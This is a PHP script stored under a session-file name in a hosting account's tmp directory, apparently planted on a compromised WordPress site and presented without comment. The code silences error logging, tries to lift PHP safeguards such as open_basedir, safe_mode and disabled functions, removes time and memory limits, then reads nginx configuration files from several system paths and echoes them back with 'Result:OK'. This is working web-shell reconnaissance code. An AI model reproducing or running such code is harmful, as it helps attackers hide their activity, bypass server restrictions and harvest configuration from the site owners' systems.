File: /home/chok2006/tmp/sess_4bb2ac77ca39803e5598d6b4bf23039e
<?php @ini_set("log_errors_max_len",-1);@ini_restore("error_log");@ini_set("error_log","");@ini_restore("log_errors");@ini_set("log_errors",0);@ini_set("display_errors",0);@ini_restore("error_reporting");@ini_set("error_reporting",~E_ALL);@error_reporting(0);if(version_compare(phpversion(), "5.4.0", "<")){@ini_restore("safe_mode");@ini_set("safe_mode",0);@ini_restore("safe_mode_exec_dir");@ini_set("safe_mode_exec_dir","");@ini_restore("magic_quotes_sybase");@ini_set("magic_quotes_sybase",0);@ini_restore("magic_quotes_runtime");@ini_set("magic_quotes_runtime",0);@ini_set("magic_quotes_gpc",0);@set_magic_quotes_runtime(0);}@ini_restore("open_basedir");@ini_set("open_basedir","");@ini_restore("disable_function");@ini_set("disable_function","");@ini_restore("disable_classes");@ini_set("disable_classes","");@ini_set("max_execution_time",0);@set_time_limit(0);@ini_set("memory_limit","1024M");@ini_restore("file_uploads");@ini_set("file_uploads",1);@ini_restore("enable_post_data_reading");@ini_set("enable_post_data_reading",1); echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";@chdir("/home/chok2006/domains/chok2006.com/public_html/wp-admin/");ob_start();$s="";if(!function_exists("file_get_contents")){function file_get_contents($filename){$fp=@fopen($filename,"r");if(!$fp){return false;}else{while(!@feof($fp))$fc.=@fgets($fp,1024);@fclose($fp);return $fc;}}}if(@file_exists("/etc/nginx/nginx.conf")&&@is_readable("/etc/nginx/nginx.conf"))$s.=@file_get_contents("/etc/nginx/nginx.conf");if(@file_exists("/etc/nginx/conf.d/nginx.conf")&&@is_readable("/etc/nginx/conf.d/nginx.conf"))$s.=@file_get_contents("/etc/nginx/conf.d/nginx.conf");if(@file_exists("/usr/local/nginx/conf/nginx.conf")&&@is_readable("/usr/local/nginx/conf/nginx.conf"))$s.=@file_get_contents("/usr/local/nginx/conf/nginx.conf");if(@file_exists("/usr/local/etc/nginx/nginx.conf")&&@is_readable("/usr/local/etc/nginx/nginx.conf"))$s.=@file_get_contents("/usr/local/etc/nginx/nginx.conf");if(strlen($s) < 1000000)echo $s;$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>"; die;